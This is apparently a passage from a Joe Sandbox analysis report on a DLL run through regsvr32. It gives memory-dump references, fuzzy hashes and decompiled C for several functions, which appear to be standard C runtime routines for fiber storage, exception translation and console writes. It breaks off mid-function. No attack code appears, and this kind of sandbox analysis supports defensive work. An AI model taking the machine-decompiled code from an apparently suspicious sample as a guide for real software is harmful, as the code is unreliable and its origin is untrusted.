Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 0000000180007E9D
FlsSetValue.KERNEL32 ref: 0000000180007EBC
FlsSetValue.KERNEL32 ref: 0000000180007EE4
FlsSetValue.KERNEL32 ref: 0000000180007EF5
FlsSetValue.KERNEL32 ref: 0000000180007F06

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}

0x180003800
0x180003803
0x180003807
0x18000380b
0x18000381a
0x18000381e
0x180003834
0x180003836
0x18000383b
0x180003848
0x18000384c
0x180003855
0x18000385e
0x180003867
0x180003870
0x180003874
0x180003884
0x18000388c
0x180003891
0x180003896
0x18000389b
0x1800038a2
0x1800038be

APIs

EncodePointer.KERNEL32 ref: 000000018000384C
_CallSETranslator.LIBVCRUNTIME ref: 000000018000389B

Strings

MOC, xrefs: 0000000180003860
RCC, xrefs: 0000000180003869

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0xe153c63ea8e4
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

0x18000d5b8
0x18000d5c6
0x18000d5ca
0x18000d5d1
0x18000d5d9
0x18000d5dd
0x18000d5e7
0x18000d5ee
0x18000d5f5
0x18000d5fc
0x18000d606
0x18000d60a
0x18000d618
0x18000d624
0x18000d629
0x18000d62d
0x18000d630
0x18000d633
0x18000d63d
0x18000d64a
0x18000d64f
0x18000d65c
0x18000d65f
0x18000d664
0x18000d667
0x18000d66e
0x18000d677
0x18000d67b
0x18000d683
0x18000d686
0x18000d689
0x18000d69c
0x18000d6af
0x18000d6ba
0x18000d6be
0x18000d6c8
0x18000d6cd
0x18000d6e1
0x18000d6ea
0x18000d6f0
0x18000d6f2
0x18000d6fc
0x18000d702
0x18000d708
0x18000d71d
0x18000d72a
0x18000d72f
0x18000d73b
0x18000d740
0x18000d74b
0x18000d759
0x18000d764
0x18000d766
0x18000d76a
0x18000d76e
0x18000d77b
0x18000d77d
0x18000d780
0x18000d783
0x18000d794
0x18000d79d
0x18000d7ab
0x18000d7ae
0x18000d7b6
0x18000d7bf
0x18000d7ca
0x18000d7d0
0x18000d7d6
0x18000d7da
0x18000d7e6
0x18000d7e8
0x18000d7eb
0x18000d7ee
0x18000d7f3
0x18000d7ff
0x18000d808
0x18000d80e
0x18000d811
0x18000d814
0x18000d818
0x18000d81d
0x18000d825
0x18000d82d
0x18000d834
0x18000d839
0x18000d83f
0x18000d844
0x18000d84e
0x18000d850
0x18000d860
0x18000d862
0x18000d86a
0x18000d873
0x18000d888
0x18000d88e
0x18000d891
0x18000d8a0
0x18000d8a8
0x18000d8ae
0x18000d8b1
0x18000d8b6
0x18000d8bb
0x18000d8c3
0x18000d8c7
0x18000d8cc
0x18000d8cf
0x18000d8d8
0x18000d8dd
0x18000d8e2
0x18000d8e8
0x18000d8f1
0x18000d907
0x18000d915
0x18000d91c
0x18000d926
0x18000d92d
0x18000d931
0x18000d93a
0x18000d93a
0x18000d93e
0x18000d94d
0x18000d957
0x18000d95d
0x18000d960
0x18000d96a
0x18000d97b
0x18000d983
0x18000d985
0x18000d997
0x18000d9a7
0x18000d9a9
0x18000d9ac
0x18000d9b1
0x18000d9b3
0x18000d9c8
0x18000d9cf
0x18000d9d8
0x18000d9da
0x18000d9de
0x18000d9e0
0x18000d9ed
0x18000d9f3
0x18000d9f6
0x18000d9f9
0x18000da01
0x18000da2c

APIs

GetConsoleOutputCP.KERNEL32 ref: 000000018000D637
WriteFile.KERNEL32 ref: 000000018000D8FF
WriteFile.KERNEL32 ref: 000000018000D945
GetLastError.KERNEL32 ref: 000000018000D9FB

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}

0x18000dee0
0x18000dee0
0x18000def6
0x18000defc
0x18000deff
0x18000df05
0x18000df0e
0x18000df10
0x18000df15
0x18000df18
0x18000df1e
0x18000df25
0x18000df2d
0x18000df30
0x18000df35
0x18000df3a
0x18000df42
0x18000df57
0x18000df5b
0x18000df5f
0x18000df67
0x18000df6c
0x18000df73
0x18000df7c
0x18000df84
0x18000df8b
0x18000df8b
0x18000df8f
0x18000df97
0x18000dfa9
0x18000dfb8
0x18000dfc2
0x18000dfc7
0x18000dfde
0x18000dfe0
0x18000dfe9
0x18000e004
0x18000e00a
0x18000e00e
0x18000e010
0x18000e019
0x18000e01e
0x18000e024
0x18000e028
0x18000e02c
0x18000e032
0x18000e034
0x18000e03f
0x18000e043
0x18000e048
0x18000e04f
0x18000e051
0x18000e055
0x18000e05d
0x18000e071
0x18000e073
0x18000e076
0x18000e083
0x18000e085
0x18000e08d
0x18000e090
0x18000e094
0x18000e099
0x18000e09c
0x18000e0ab
0x18000e0b0
0x18000e0b7
0x18000e0cc
0x18000e0ce
0x18000e0d2
0x18000e0d4
0x18000e0d9
0x18000e0de
0x18000e0e4
0x18000e0f1
0x18000e0f6
0x18000e0f8
0x18000e105
0x18000e10a
0x18000e10c
0x18000e119
0x18000e11e
0x18000e12b
0x18000e12e
0x18000e136
0x18000e13a
0x18000e145
0x18000e147
0x18000e14d
0x18000e153
0x18000e158
0x18000e16e
0x18000e170
0x18000e175
0x18000e17a
0x18000e17c
0x18000e180
0x18000e187
0x18000e18b
0x18000e18e
0x18000e196
0x18000e199
0x18000e19e
0x18000e1ad
0x18000e1b2
0x18000e1b4
0x18000e1b8
0x18000e1bc
0x18000e1c3
0x18000e1c7
0x18000e1d1
0x18000e1e5

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0xe153c63ea8e4
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
